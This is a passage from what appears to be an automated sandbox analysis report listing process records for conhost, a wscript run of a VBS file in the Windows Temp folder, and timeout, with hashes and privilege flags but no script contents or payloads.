                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6e60e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:2
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:wscript //nologo "C:\Windows\Temp\trickishly.vbs"
                      Imagebase:0x7ff709be0000
                      File size:170'496 bytes
                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      Target ID:3
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\timeout.exe
                      Wow64 process (32bit):false
                      Commandline:timeout /t 1 /nobreak
                      Imagebase:0x7ff71e2a0000
                      File size:32'768 bytes
                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      No disassembly